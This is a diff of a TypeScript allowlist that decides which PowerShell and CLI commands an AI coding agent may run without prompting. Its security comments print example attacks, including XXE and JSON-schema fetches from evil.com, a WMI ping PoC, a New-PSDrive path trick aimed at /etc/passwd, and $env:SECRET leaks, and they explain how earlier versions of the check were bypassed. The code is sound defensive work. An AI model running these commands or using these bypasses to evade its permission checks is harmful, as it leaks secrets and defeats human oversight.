+ '-MemberType',
299
+ '-Name',
300
+ '-Static',
301
+ '-View',
302
+ '-Force',
303
+ ],
304
+ },
305
+ 'get-unique': {
306
+ safeFlags: ['-InputObject', '-AsString', '-CaseInsensitive', '-OnType'],
307
+ },
308
+ 'compare-object': {
309
+ safeFlags: [
310
+ '-ReferenceObject',
311
+ '-DifferenceObject',
312
+ '-Property',
313
+ '-SyncWindow',
314
+ '-CaseSensitive',
315
+ '-Culture',
316
+ '-ExcludeDifferent',
317
+ '-IncludeEqual',
318
+ '-PassThru',
319
+ ],
320
+ },
321
+ // SECURITY: select-xml REMOVED. XML external entity (XXE) resolution can
322
+ // trigger network requests via DOCTYPE SYSTEM/PUBLIC references in -Content
323
+ // or -Xml. `Select-Xml -Content '<!DOCTYPE x [<!ENTITY e SYSTEM
324
+ // "http://evil.com/x">]><x>&e;</x>' -XPath '/'` sends a GET request.
325
+ // PowerShell's XmlDocument.LoadXml doesn't disable entity resolution by
326
+ // default. Removal forces prompt.
327
+ 'join-string': {
328
+ safeFlags: [
329
+ '-InputObject',
330
+ '-Property',
331
+ '-Separator',
332
+ '-OutputPrefix',
333
+ '-OutputSuffix',
334
+ '-SingleQuote',
335
+ '-DoubleQuote',
336
+ '-FormatString',
337
+ ],
338
+ },
339
+ // SECURITY: Test-Json REMOVED. -Schema (positional 1) accepts JSON Schema
340
+ // with $ref pointing to external URLs — Test-Json fetches them (network
341
+ // request). safeFlags only validates EXPLICIT flags, not positional binding:
342
+ // `Test-Json '{}' '{"$ref":"http://evil.com"}'` → position 1 binds to
343
+ // -Schema → safeFlags check sees two non-flag args, skips both → auto-allow.
344
+ 'get-random': {
345
+ safeFlags: [
346
+ '-InputObject',
347
+ '-Minimum',
348
+ '-Maximum',
349
+ '-Count',
350
+ '-SetSeed',
351
+ '-Shuffle',
352
+ ],
353
+ },
354
+
355
+ // =========================================================================
356
+ // PowerShell Cmdlets - Path utilities (read-only)
357
+ // =========================================================================
358
+ // convert-path's entire purpose is to resolve filesystem paths. It is now
359
+ // in CMDLET_PATH_CONFIG for proper path validation, so safeFlags here only
360
+ // list the path parameters (which CMDLET_PATH_CONFIG will validate).
361
+ 'convert-path': {
362
+ safeFlags: ['-Path', '-LiteralPath'],
363
+ },
364
+ 'join-path': {
365
+ // -Resolve removed: it touches the filesystem to verify the joined path
366
+ // exists, but the path was not validated against allowed directories.
367
+ // Without -Resolve, Join-Path is pure string manipulation.
368
+ safeFlags: ['-Path', '-ChildPath', '-AdditionalChildPath'],
369
+ },
370
+ 'split-path': {
371
+ // -Resolve removed: same rationale as join-path. Without -Resolve,
372
+ // Split-Path is pure string manipulation.
373
+ safeFlags: [
374
+ '-Path',
375
+ '-LiteralPath',
376
+ '-Qualifier',
377
+ '-NoQualifier',
378
+ '-Parent',
379
+ '-Leaf',
380
+ '-LeafBase',
381
+ '-Extension',
382
+ '-IsAbsolute',
383
+ ],
384
+ },
385
+
386
+ // =========================================================================
387
+ // PowerShell Cmdlets - Additional system info (read-only)
388
+ // =========================================================================
389
+ // NOTE: Get-Clipboard is intentionally NOT included - it can expose sensitive
390
+ // data like passwords or API keys that the user may have copied. Bash also
391
+ // does not auto-allow clipboard commands (pbpaste, xclip, etc.).
392
+ 'get-hotfix': {
393
+ safeFlags: ['-Id', '-Description'],
394
+ },
395
+ 'get-itempropertyvalue': {
396
+ safeFlags: ['-Path', '-LiteralPath', '-Name'],
397
+ },
398
+ 'get-psprovider': {
399
+ safeFlags: ['-PSProvider'],
400
+ },
401
+
402
+ // =========================================================================
403
+ // PowerShell Cmdlets - Process/System info
404
+ // =========================================================================
405
+ 'get-process': {
406
+ safeFlags: [
407
+ '-Name',
408
+ '-Id',
409
+ '-Module',
410
+ '-FileVersionInfo',
411
+ '-IncludeUserName',
412
+ ],
413
+ },
414
+ 'get-service': {
415
+ safeFlags: [
416
+ '-Name',
417
+ '-DisplayName',
418
+ '-DependentServices',
419
+ '-RequiredServices',
420
+ '-Include',
421
+ '-Exclude',
422
+ ],
423
+ },
424
+ 'get-computerinfo': {
425
+ allowAllFlags: true,
426
+ },
427
+ 'get-host': {
428
+ allowAllFlags: true,
429
+ },
430
+ 'get-date': {
431
+ safeFlags: ['-Date', '-Format', '-UFormat', '-DisplayHint', '-AsUTC'],
432
+ },
433
+ 'get-location': {
434
+ safeFlags: ['-PSProvider', '-PSDrive', '-Stack', '-StackName'],
435
+ },
436
+ 'get-psdrive': {
437
+ safeFlags: ['-Name', '-PSProvider', '-Scope'],
438
+ },
439
+ // SECURITY: Get-Command REMOVED from allowlist. -Name (positional 0,
440
+ // ValueFromPipeline=true) triggers module autoload which runs .psm1 init
441
+ // code. Chain attack: pre-plant module in PSModulePath, trigger autoload.
442
+ // Previously tried removing -Name/-Module from safeFlags + rejecting
443
+ // positional StringConstant, but pipeline input (`'EvilCmdlet' | Get-Command`)
444
+ // bypasses the callback entirely since args are empty. Removal forces
445
+ // prompt. Users who need it can add explicit allow rule.
446
+ 'get-module': {
447
+ safeFlags: [
448
+ '-Name',
449
+ '-ListAvailable',
450
+ '-All',
451
+ '-FullyQualifiedName',
452
+ '-PSEdition',
453
+ ],
454
+ },
455
+ // SECURITY: Get-Help REMOVED from allowlist. Same module autoload hazard
456
+ // as Get-Command (-Name has ValueFromPipeline=true, pipeline input bypasses
457
+ // arg-level callback). Removal forces prompt.
458
+ 'get-alias': {
459
+ safeFlags: ['-Name', '-Definition', '-Scope', '-Exclude'],
460
+ },
461
+ 'get-history': {
462
+ safeFlags: ['-Id', '-Count'],
463
+ },
464
+ 'get-culture': {
465
+ allowAllFlags: true,
466
+ },
467
+ 'get-uiculture': {
468
+ allowAllFlags: true,
469
+ },
470
+ 'get-timezone': {
471
+ safeFlags: ['-Name', '-Id', '-ListAvailable'],
472
+ },
473
+ 'get-uptime': {
474
+ allowAllFlags: true,
475
+ },
476
+
477
+ // =========================================================================
478
+ // PowerShell Cmdlets - Output & misc (no side effects)
479
+ // =========================================================================
480
+ // Bash parity: `echo` is auto-allowed via custom regex (BashTool
481
+ // readOnlyValidation.ts:~1517). That regex WHITELISTS safe chars per arg.
482
+ // See argLeaksValue above for the three attack shapes it blocks.
483
+ 'write-output': {
484
+ safeFlags: ['-InputObject', '-NoEnumerate'],
485
+ additionalCommandIsDangerousCallback: argLeaksValue,
486
+ },
487
+ // Write-Host bypasses the pipeline (Information stream, PS5+), so it's
488
+ // strictly less capable than Write-Output — but the same
489
+ // `Write-Host $env:SECRET` leak-via-display applies.
490
+ 'write-host': {
491
+ safeFlags: [
492
+ '-Object',
493
+ '-NoNewline',
494
+ '-Separator',
495
+ '-ForegroundColor',
496
+ '-BackgroundColor',
497
+ ],
498
+ additionalCommandIsDangerousCallback: argLeaksValue,
499
+ },
500
+ // Bash parity: `sleep` is in READONLY_COMMANDS (BashTool
501
+ // readOnlyValidation.ts:~1146). Zero side effects at runtime — but
502
+ // `Start-Sleep $env:SECRET` leaks via type-coerce error. Same guard.
503
+ 'start-sleep': {
504
+ safeFlags: ['-Seconds', '-Milliseconds', '-Duration'],
505
+ additionalCommandIsDangerousCallback: argLeaksValue,
506
+ },
507
+ // Format-* and Measure-Object moved here from SAFE_OUTPUT_CMDLETS after
508
+ // security review found all accept calculated-property hashtables (same
509
+ // exploit as Where-Object — I4 regression). isSafeOutputCommand is a
510
+ // NAME-ONLY check that filtered them out of the approval loop BEFORE arg
511
+ // validation. Here, argLeaksValue validates args:
512
+ // | Format-Table → no args → safe → allow
513
+ // | Format-Table Name, CPU → StringConstant positionals → safe → allow
514
+ // | Format-Table $env:SECRET → Variable elementType → blocked → passthrough
515
+ // | Format-Table @{N='x';E={}} → Other (HashtableAst) → blocked → passthrough
516
+ // | Measure-Object -Property $env:SECRET → same → blocked
517
+ // allowAllFlags: argLeaksValue validates arg elementTypes (Variable/Hashtable/
518
+ // ScriptBlock → blocked). Format-* flags themselves (-AutoSize, -GroupBy,
519
+ // -Wrap, etc.) are display-only. Without allowAllFlags, the empty-safeFlags
520
+ // default rejects ALL flags — `Format-Table -AutoSize` would over-prompt.
521
+ 'format-table': {
522
+ allowAllFlags: true,
523
+ additionalCommandIsDangerousCallback: argLeaksValue,
524
+ },
525
+ 'format-list': {
526
+ allowAllFlags: true,
527
+ additionalCommandIsDangerousCallback: argLeaksValue,
528
+ },
529
+ 'format-wide': {
530
+ allowAllFlags: true,
531
+ additionalCommandIsDangerousCallback: argLeaksValue,
532
+ },
533
+ 'format-custom': {
534
+ allowAllFlags: true,
535
+ additionalCommandIsDangerousCallback: argLeaksValue,
536
+ },
537
+ 'measure-object': {
538
+ allowAllFlags: true,
539
+ additionalCommandIsDangerousCallback: argLeaksValue,
540
+ },
541
+ // Select-Object/Sort-Object/Group-Object/Where-Object: same calculated-
542
+ // property hashtable surface as format-* (about_Calculated_Properties).
543
+ // Removed from SAFE_OUTPUT_CMDLETS but previously missing here, causing
544
+ // `Get-Process | Select-Object Name` to over-prompt. argLeaksValue handles
545
+ // them identically: StringConstant property names pass (`Select-Object Name`),
546
+ // HashtableAst/ScriptBlock/Variable args block (`Select-Object @{N='x';E={...}}`,
547
+ // `Where-Object { ... }`). allowAllFlags: -First/-Last/-Skip/-Descending/
548
+ // -Property/-EQ etc. are all selection/ordering flags — harmless on their own;
549
+ // argLeaksValue catches the dangerous arg *values*.
550
+ 'select-object': {
551
+ allowAllFlags: true,
552
+ additionalCommandIsDangerousCallback: argLeaksValue,
553
+ },
554
+ 'sort-object': {
555
+ allowAllFlags: true,
556
+ additionalCommandIsDangerousCallback: argLeaksValue,
557
+ },
558
+ 'group-object': {
559
+ allowAllFlags: true,
560
+ additionalCommandIsDangerousCallback: argLeaksValue,
561
+ },
562
+ 'where-object': {
563
+ allowAllFlags: true,
564
+ additionalCommandIsDangerousCallback: argLeaksValue,
565
+ },
566
+ // Out-String/Out-Host moved here from SAFE_OUTPUT_CMDLETS — both accept
567
+ // -InputObject which leaks the same way Write-Output does.
568
+ // `Get-Process | Out-String -InputObject $env:SECRET` → secret prints.
569
+ // allowAllFlags: -Width/-Stream/-Paging/-NoNewline are display flags;
570
+ // argLeaksValue catches the dangerous -InputObject *value*.
571
+ 'out-string': {
572
+ allowAllFlags: true,
573
+ additionalCommandIsDangerousCallback: argLeaksValue,
574
+ },
575
+ 'out-host': {
576
+ allowAllFlags: true,
577
+ additionalCommandIsDangerousCallback: argLeaksValue,
578
+ },
579
+
580
+ // =========================================================================
581
+ // PowerShell Cmdlets - Network info (read-only)
582
+ // =========================================================================
583
+ 'get-netadapter': {
584
+ safeFlags: [
585
+ '-Name',
586
+ '-InterfaceDescription',
587
+ '-InterfaceIndex',
588
+ '-Physical',
589
+ ],
590
+ },
591
+ 'get-netipaddress': {
592
+ safeFlags: [
593
+ '-InterfaceIndex',
594
+ '-InterfaceAlias',
595
+ '-AddressFamily',
596
+ '-Type',
597
+ ],
598
+ },
599
+ 'get-netipconfiguration': {
600
+ safeFlags: ['-InterfaceIndex', '-InterfaceAlias', '-Detailed', '-All'],
601
+ },
602
+ 'get-netroute': {
603
+ safeFlags: [
604
+ '-InterfaceIndex',
605
+ '-InterfaceAlias',
606
+ '-AddressFamily',
607
+ '-DestinationPrefix',
608
+ ],
609
+ },
610
+ 'get-dnsclientcache': {
611
+ // SECURITY: -CimSession/-ThrottleLimit excluded. -CimSession connects to
612
+ // a remote host (network request). Previously empty config = all flags OK.
613
+ safeFlags: ['-Entry', '-Name', '-Type', '-Status', '-Section', '-Data'],
614
+ },
615
+ 'get-dnsclient': {
616
+ safeFlags: ['-InterfaceIndex', '-InterfaceAlias'],
617
+ },
618
+
619
+ // =========================================================================
620
+ // PowerShell Cmdlets - Event log (read-only)
621
+ // =========================================================================
622
+ 'get-eventlog': {
623
+ safeFlags: [
624
+ '-LogName',
625
+ '-Newest',
626
+ '-After',
627
+ '-Before',
628
+ '-EntryType',
629
+ '-Index',
630
+ '-InstanceId',
631
+ '-Message',
632
+ '-Source',
633
+ '-UserName',
634
+ '-AsBaseObject',
635
+ '-List',
636
+ ],
637
+ },
638
+ 'get-winevent': {
639
+ // SECURITY: -FilterXml/-FilterHashtable removed. -FilterXml accepts XML
640
+ // with DOCTYPE external entities (XXE → network request). -FilterHashtable
641
+ // would be caught by the elementTypes 'Other' check since @{} is
642
+ // HashtableAst, but removal is explicit. Same XXE hazard as Select-Xml
643
+ // (removed above). -FilterXPath kept (string pattern only, no entity
644
+ // resolution). -ComputerName/-Credential also implicitly excluded.
645
+ safeFlags: [
646
+ '-LogName',
647
+ '-ListLog',
648
+ '-ListProvider',
649
+ '-ProviderName',
650
+ '-Path',
651
+ '-MaxEvents',
652
+ '-FilterXPath',
653
+ '-Force',
654
+ '-Oldest',
655
+ ],
656
+ },
657
+
658
+ // =========================================================================
659
+ // PowerShell Cmdlets - WMI/CIM
660
+ // =========================================================================
661
+ // SECURITY: Get-WmiObject and Get-CimInstance REMOVED. They actively
662
+ // trigger network requests via classes like Win32_PingStatus (sends ICMP
663
+ // when enumerated) and can query remote computers via -ComputerName/
664
+ // CimSession. -Class/-ClassName/-Filter/-Query accept arbitrary WMI
665
+ // classes/WQL that we cannot statically validate.
666
+ // PoC: Get-WmiObject -Class Win32_PingStatus -Filter 'Address="evil.com"'
667
+ // → sends ICMP to evil.com (DNS leak + potential NTLM auth leak).
668
+ // WMI can also auto-load provider DLLs (init code). Removal forces prompt.
669
+ // get-cimclass stays — only lists class metadata, no instance enumeration.
670
+ 'get-cimclass': {
671
+ safeFlags: [
672
+ '-ClassName',
673
+ '-Namespace',
674
+ '-MethodName',
675
+ '-PropertyName',
676
+ '-QualifierName',
677
+ ],
678
+ },
679
+
680
+ // =========================================================================
681
+ // Git - uses shared external command validation with per-flag checking
682
+ // =========================================================================
683
+ git: {},
684
+
685
+ // =========================================================================
686
+ // GitHub CLI (gh) - uses shared external command validation
687
+ // =========================================================================
688
+ gh: {},
689
+
690
+ // =========================================================================
691
+ // Docker - uses shared external command validation
692
+ // =========================================================================
693
+ docker: {},
694
+
695
+ // =========================================================================
696
+ // Windows-specific system commands
697
+ // =========================================================================
698
+ ipconfig: {
699
+ // SECURITY: On macOS, `ipconfig set <iface> <mode>` configures network
700
+ // (writes system config). safeFlags only validates FLAGS, positional args
701
+ // are SKIPPED. Reject any positional argument — only bare `ipconfig` or
702
+ // `ipconfig /all` (read-only display) allowed. Windows ipconfig only uses
703
+ // /flags (display), macOS ipconfig uses subcommands (get/set/waitall).
704
+ safeFlags: ['/all', '/displaydns', '/allcompartments'],
705
+ additionalCommandIsDangerousCallback: (
706
+ _cmd: string,
707
+ element?: ParsedCommandElement,
708
+ ) => {
709
+ return (element?.args ?? []).some(
710
+ a => !a.startsWith('/') && !a.startsWith('-'),
711
+ )
712
+ },
713
+ },
714
+ netstat: {
715
+ safeFlags: [
716
+ '-a',
717
+ '-b',
718
+ '-e',
719
+ '-f',
720
+ '-n',
721
+ '-o',
722
+ '-p',
723
+ '-q',
724
+ '-r',
725
+ '-s',
726
+ '-t',
727
+ '-x',
728
+ '-y',
729
+ ],
730
+ },
731
+ systeminfo: {
732
+ safeFlags: ['/FO', '/NH'],
733
+ },
734
+ tasklist: {
735
+ safeFlags: ['/M', '/SVC', '/V', '/FI', '/FO', '/NH'],
736
+ },
737
+ // where.exe: Windows PATH locator, bash `which` equivalent. Reaches here via
738
+ // SAFE_EXTERNAL_EXES bypass at the nameType gate in isAllowlistedCommand.
739
+ // All flags are read-only (/R /F /T /Q), matching bash's treatment of `which`
740
+ // in BashTool READONLY_COMMANDS.
741
+ 'where.exe': {
742
+ allowAllFlags: true,
743
+ },
744
+ hostname: {
745
+ // SECURITY: `hostname NAME` on Linux/macOS SETS the hostname (writes to
746
+ // system config). `hostname -F FILE` / `--file=FILE` also sets from file.
747
+ // Only allow bare `hostname` and known read-only flags.
748
+ safeFlags: ['-a', '-d', '-f', '-i', '-I', '-s', '-y', '-A'],
749
+ additionalCommandIsDangerousCallback: (
750
+ _cmd: string,
751
+ element?: ParsedCommandElement,
752
+ ) => {
753
+ // Reject any positional (non-flag) argument — sets hostname.
754
+ return (element?.args ?? []).some(a => !a.startsWith('-'))
755
+ },
756
+ },
757
+ whoami: {
758
+ safeFlags: [
759
+ '/user',
760
+ '/groups',
761
+ '/claims',
762
+ '/priv',
763
+ '/logonid',
764
+ '/all',
765
+ '/fo',
766
+ '/nh',
767
+ ],
768
+ },
769
+ ver: {
770
+ allowAllFlags: true,
771
+ },
772
+ arp: {
773
+ safeFlags: ['-a', '-g', '-v', '-N'],
774
+ },
775
+ route: {
776
+ safeFlags: ['print', 'PRINT', '-4', '-6'],
777
+ additionalCommandIsDangerousCallback: (
778
+ _cmd: string,
779
+ element?: ParsedCommandElement,
780
+ ) => {
781
+ // SECURITY: route.exe syntax is `route [-f] [-p] [-4|-6] VERB [args...]`.
782
+ // The first non-flag positional is the verb. `route add 10.0.0.0 mask
783
+ // 255.0.0.0 192.168.1.1 print` adds a route (print is a trailing display
784
+ // modifier). The old check used args.some('print') which matched 'print'
785
+ // anywhere — position-insensitive.
786
+ if (!element) {
787
+ return true
788
+ }
789
+ const verb = element.args.find(a => !a.startsWith('-'))
790
+ return verb?.toLowerCase() !== 'print'
791
+ },
792
+ },
793
+ // netsh: intentionally NOT allowlisted. Three rounds of denylist gaps in PR
794
+ // #22060 (verb position → dash flags → slash flags → more verbs) proved
795
+ // the grammar is too complex to allowlist safely: 3-deep context nesting
796
+ // (`netsh interface ipv4 show addresses`), dual-prefix flags (-f / /f),
797
+ // script execution via -f and `exec`, remote RPC via -r, offline-mode
798
+ // commit, wlan connect/disconnect, etc. Each denylist expansion revealed
799
+ // another gap. `route` stays — `route print` is the only read-only form,
800
+ // simple single-verb-position grammar.
801
+ getmac: {
802
+ safeFlags: ['/FO', '/NH', '/V'],
803
+ },
804
+
805
+ // =========================================================================
806
+ // Cross-platform CLI tools
807
+ // =========================================================================
808
+ // File inspection
809
+ // SECURITY: file -C compiles a magic database and WRITES to disk. Only
810
+ // allow introspection flags; reject -C / --compile / -m / --magic-file.
811
+ file: {
812
+ safeFlags: [
813
+ '-b',
814
+ '--brief',
815
+ '-i',
816
+ '--mime',
817
+ '-L',
818
+ '--dereference',
819
+ '--mime-type',
820
+ '--mime-encoding',
821
+ '-z',
822
+ '--uncompress',
823
+ '-p',
824
+ '--preserve-date',
825
+ '-k',
826
+ '--keep-going',
827
+ '-r',
828
+ '--raw',
829
+ '-v',
830
+ '--version',
831
+ '-0',
832
+ '--print0',
833
+ '-s',
834
+ '--special-files',
835
+ '-l',
836
+ '-F',
837
+ '--separator',
838
+ '-e',
839
+ '-P',
840
+ '-N',
841
+ '--no-pad',
842
+ '-E',
843
+ '--extension',
844
+ ],
845
+ },
846
+ tree: {
847
+ safeFlags: ['/F', '/A', '/Q', '/L'],
848
+ },
849
+ findstr: {
850
+ safeFlags: [
851
+ '/B',
852
+ '/E',
853
+ '/L',
854
+ '/R',
855
+ '/S',
856
+ '/I',
857
+ '/X',
858
+ '/V',
859
+ '/N',
860
+ '/M',
861
+ '/O',
862
+ '/P',
863
+ // Flag matching strips ':' before comparison (e.g., /C:pattern → /C),
864
+ // so these entries must NOT include the trailing colon.
865
+ '/C',
866
+ '/G',
867
+ '/D',
868
+ '/A',
869
+ ],
870
+ },
871
+
872
+ // =========================================================================
873
+ // Package managers - uses shared external command validation
874
+ // =========================================================================
875
+ dotnet: {},
876
+
877
+ // SECURITY: man and help direct entries REMOVED. They aliased Get-Help
878
+ // (also removed — see above). Without these entries, lookupAllowlist
879
+ // resolves via COMMON_ALIASES to 'get-help' which is not in allowlist →
880
+ // prompt. Same module-autoload hazard as Get-Help.
881
+ },
882
+ )
883
+
884
+ /**
885
+ * Safe output/formatting cmdlets that can receive piped input.
886
+ * Stored as canonical cmdlet names in lowercase.
887
+ */
888
+ const SAFE_OUTPUT_CMDLETS = new Set([
889
+ 'out-null',
890
+ // NOT out-string/out-host — both accept -InputObject which leaks args the
891
+ // same way Write-Output does. Moved to CMDLET_ALLOWLIST with argLeaksValue.
892
+ // `Get-Process | Out-String -InputObject $env:SECRET` — Out-String was
893
+ // filtered name-only, the $env arg was never validated.
894
+ // out-null stays: it discards everything, no -InputObject leak.
895
+ // NOT foreach-object / where-object / select-object / sort-object /
896
+ // group-object / format-table / format-list / format-wide / format-custom /
897
+ // measure-object — ALL accept calculated-property hashtables or script-block
898
+ // predicates that evaluate arbitrary expressions at runtime
899
+ // (about_Calculated_Properties). Examples:
900
+ // Where-Object @{k=$env:SECRET} — HashtableAst arg, 'Other' elementType
901
+ // Select-Object @{N='x';E={...}} — calculated property scriptblock
902
+ // Format-Table $env:SECRET — positional -Property, prints as header
903
+ // Measure-Object -Property $env:SECRET — leaks via "property 'sk-...' not found"
904
+ // ForEach-Object { $env:PATH='e' } — arbitrary script body
905
+ // isSafeOutputCommand is a NAME-ONLY check — step-5 filters these out of
906
+ // the approval loop BEFORE arg validation runs. With them here, an
907
+ // all-safe-output tail auto-allows on empty subCommands regardless of
908
+ // what the arg contains. Removing them forces the tail through arg-level
909
+ // validation (hashtable is 'Other' elementType → fails the whitelist at
910
+ // isAllowlistedCommand → ask; bare $var is 'Variable' → same).
911
+ //
912
+ // NOT write-output — pipeline-initial $env:VAR is a VariableExpressionAst,
913
+ // skipped by getSubCommandsForPermissionCheck (non-CommandAst). With
914
+ // write-output here, `$env:SECRET | Write-Output` → WO filtered as
915
+ // safe-output → empty subCommands → auto-allow → secret prints. The
916
+ // CMDLET_ALLOWLIST entry handles direct `Write-Output 'literal'`.
917
+ ])
918
+
919
+ /**
920
+ * Cmdlets moved from SAFE_OUTPUT_CMDLETS to CMDLET_ALLOWLIST with
921
+ * argLeaksValue. These are pipeline-tail transformers (Format-*,
922
+ * Measure-Object, Select-Object, etc.) that were previously name-only
923
+ * filtered as safe-output. They now require arg validation (argLeaksValue
924
+ * blocks calculated-property hashtables / scriptblocks / variable args).
925
+ *
926
+ * Used by isAllowlistedPipelineTail for the narrow fallback in
927
+ * checkPermissionMode and isReadOnlyCommand — these callers need the same
928
+ * "skip harmless pipeline tail" behavior as SAFE_OUTPUT_CMDLETS but with
929
+ * the argLeaksValue guard.
930
+ */
931
+ const PIPELINE_TAIL_CMDLETS = new Set([
932
+ 'format-table',
933
+ 'format-list',
934
+ 'format-wide',
935
+ 'format-custom',
936
+ 'measure-object',
937
+ 'select-object',
938
+ 'sort-object',
939
+ 'group-object',
940
+ 'where-object',
941
+ 'out-string',
942
+ 'out-host',
943
+ ])
944
+
945
+ /**
946
+ * External .exe names allowed past the nameType='application' gate.
947
+ *
948
+ * classifyCommandName returns 'application' for any name containing a dot,
949
+ * which the nameType gate at isAllowlistedCommand rejects before allowlist
950
+ * lookup. That gate exists to block scripts\Get-Process → stripModulePrefix →
951
+ * cmd.name='Get-Process' spoofing. But it also catches benign PATH-resolved
952
+ * .exe names like where.exe (bash `which` equivalent — pure read, no dangerous
953
+ * flags).
954
+ *
955
+ * SECURITY: the bypass checks the raw first token of cmd.text, NOT cmd.name.
956
+ * stripModulePrefix collapses scripts\where.exe → cmd.name='where.exe', but
957
+ * cmd.text preserves the raw 'scripts\where.exe ...'. Matching cmd.text's
958
+ * first token defeats that spoofing — only a bare `where.exe` (PATH lookup)
959
+ * gets through.
960
+ *
961
+ * Each entry here MUST have a matching CMDLET_ALLOWLIST entry for flag
962
+ * validation.
963
+ */
964
+ const SAFE_EXTERNAL_EXES = new Set(['where.exe'])
965
+
966
+ /**
967
+ * Windows PATHEXT extensions that PowerShell resolves via PATH lookup.
968
+ * `git.exe`, `git.cmd`, `git.bat`, `git.com` all invoke git at runtime and
969
+ * must resolve to the same canonical name so git-safety guards fire.
970
+ * .ps1 is intentionally excluded — a script named git.ps1 is not the git
971
+ * binary and does not trigger git's hook mechanism.
972
+ */
973
+ const WINDOWS_PATHEXT = /\.(exe|cmd|bat|com)$/
974
+
975
+ /**
976
+ * Resolves a command name to its canonical cmdlet name using COMMON_ALIASES.
977
+ * Strips Windows executable extensions (.exe, .cmd, .bat, .com) from path-free
978
+ * names so e.g. `git.exe` canonicalises to `git` and triggers git-safety
979
+ * guards (powershellPermissions.ts hasGitSubCommand). SECURITY: only strips
980
+ * when the name has no path separator — `scripts\git.exe` is a relative path
981
+ * (runs a local script, not PATH-resolved git) and must NOT canonicalise to
982
+ * `git`. Returns lowercase canonical name.
983
+ */
984
+ export function resolveToCanonical(name: string): string {
985
+ let lower = name.toLowerCase()
986
+ // Only strip PATHEXT on bare names — paths run a specific file, not the
987
+ // PATH-resolved executable the guards are protecting against.
988
+ if (!lower.includes('\\') && !lower.includes('/')) {
989
+ lower = lower.replace(WINDOWS_PATHEXT, '')
990
+ }
991
+ const alias = COMMON_ALIASES[lower]
992
+ if (alias) {
993
+ return alias.toLowerCase()
994
+ }
995
+ return lower
996
+ }
997
+
998
+ /**
999
+ * Checks if a command name (after alias resolution) alters the path-resolution
1000
+ * namespace for subsequent statements in the same compound command.
1001
+ *
1002
+ * Covers TWO classes:
1003
+ * 1. Cwd-changing cmdlets: Set-Location, Push-Location, Pop-Location (and
1004
+ * aliases cd, sl, chdir, pushd, popd). Subsequent relative paths resolve
1005
+ * from the new cwd.
1006
+ * 2. PSDrive-creating cmdlets: New-PSDrive (and aliases ndr, mount on Windows).
1007
+ * Subsequent drive-prefixed paths (p:/foo) resolve via the new drive root,
1008
+ * not via the filesystem. Finding #21: `New-PSDrive -Name p -Root /etc;
1009
+ * Remove-Item p:/passwd` — the validator cannot know p: maps to /etc.
1010
+ *
1011
+ * Any compound containing one of these cannot have its later statements'
1012
+ * relative/drive-prefixed paths validated against the stale validator cwd.
1013
+ *
1014
+ * Name kept for BashTool parity (isCwdChangingCmdlet ↔ compoundCommandHasCd);
1015
+ * semantically this is "alters path-resolution namespace".
1016
+ */
1017
+ export function isCwdChangingCmdlet(name: string): boolean {
1018
+ const canonical = resolveToCanonical(name)
1019
+ return (
1020
+ canonical === 'set-location' ||
1021
+ canonical === 'push-location' ||
1022
+ canonical === 'pop-location' ||
1023
+ // New-PSDrive creates a drive mapping that redirects <name>:/... paths
1024
+ // to an arbitrary filesystem root. Aliases ndr/mount are not in
1025
+ // COMMON_ALIASES — check them explicitly (finding #21).
1026
+ canonical === 'new-psdrive' ||
1027
+ // ndr/mount are PS aliases for New-PSDrive on Windows only. On POSIX,
1028
+ // 'mount' is the native mount(8) command; treating it as PSDrive-creating
1029
+ // would false-positive. (bug #15 / review nit)
1030
+ (getPlatform() === 'windows' &&
1031
+ (canonical === 'ndr' || canonical === 'mount'))
1032
+ )
1033
+ }
1034
+
1035
+ /**
1036
+ * Checks if a command name (after alias resolution) is a safe output cmdlet.
1037
+ */
1038
+ export function isSafeOutputCommand(name: string): boolean {
1039
+ const canonical = resolveToCanonical(name)
1040
+ return SAFE_OUTPUT_CMDLETS.has(canonical)
1041
+ }
1042
+
1043
+ /**
1044
+ * Checks if a command element is a pipeline-tail transformer that was moved
1045
+ * from SAFE_OUTPUT_CMDLETS to CMDLET_ALLOWLIST (PIPELINE_TAIL_CMDLETS set)
1046
+ * AND passes its argLeaksValue guard via isAllowlistedCommand.
1047
+ *
1048
+ * Narrow fallback for isSafeOutputCommand call sites that need to keep the
1049
+ * "skip harmless pipeline tail" behavior for Format-Table / Select-Object / etc.
1050
+ * Does NOT match the full CMDLET_ALLOWLIST — only the migrated transformers.
1051
+ */
1052
+ export function isAllowlistedPipelineTail(
1053
+ cmd: ParsedCommandElement,
1054
+ originalCommand: string,
1055
+ ): boolean {
1056
+ const canonical = resolveToCanonical(cmd.name)
1057
+ if (!PIPELINE_TAIL_CMDLETS.has(canonical)) {
1058
+ return false
1059
+ }
1060
+ return isAllowlistedCommand(cmd, originalCommand)
1061
+ }
1062
+
1063
+ /**
1064
+ * Fail-closed gate for read-only auto-allow. Returns true ONLY for a
1065
+ * PipelineAst where every element is a CommandAst — the one statement
1066
+ * shape we can fully validate. Everything else (assignments, control
1067
+ * flow, expression sources, chain operators) defaults to false.
1068
+ *
1069
+ * Single code path to true. New AST types added to PowerShell fall
1070
+ * through to false by construction.
1071
+ */
1072
+ export function isProvablySafeStatement(stmt: ParsedStatement): boolean {
1073
+ if (stmt.statementType !== 'PipelineAst') return false
1074
+ // Empty commands → vacuously passes the loop below. PowerShell's
1075
+ // parser guarantees PipelineAst.PipelineElements ≥ 1 for valid source,
1076
+ // but this gate is the linchpin — defend against parser/JSON edge cases.
1077
+ if (stmt.commands.length === 0) return false
1078
+ for (const cmd of stmt.commands) {
1079
+ if (cmd.elementType !== 'CommandAst') return false
1080
+ }
1081
+ return true
1082
+ }
1083
+
1084
+ /**
1085
+ * Looks up a command in the allowlist, resolving aliases first.
1086
+ * Returns the config if found, or undefined.
1087
+ */
1088
+ function lookupAllowlist(name: string): CommandConfig | undefined {
1089
+ const lower = name.toLowerCase()
1090
+ // Direct lookup first
1091
+ const direct = CMDLET_ALLOWLIST[lower]
1092
+ if (direct) {
1093
+ return direct
1094
+ }
1095
+ // Resolve alias to canonical and look up
1096
+ const canonical = resolveToCanonical(lower)
1097
+ if (canonical !== lower) {
1098
+ return CMDLET_ALLOWLIST[canonical]
1099
+ }
1100
+ return undefined
1101
+ }
1102
+
1103
+ /**
1104
+ * Sync regex-based check for security-concerning patterns in a PowerShell command.
1105
+ * Used by isReadOnly (which must be sync) as a fast pre-filter before the
1106
+ * cmdlet allowlist check. This mirrors BashTool's checkReadOnlyConstraints
1107
+ * which checks bashCommandIsSafe_DEPRECATED before evaluating read-only status.
1108
+ *
1109
+ * Returns true if the command contains patterns that indicate it should NOT
1110
+ * be considered read-only, even if the cmdlet is in the allowlist.
1111
+ */
1112
+ export function hasSyncSecurityConcerns(command: string): boolean {
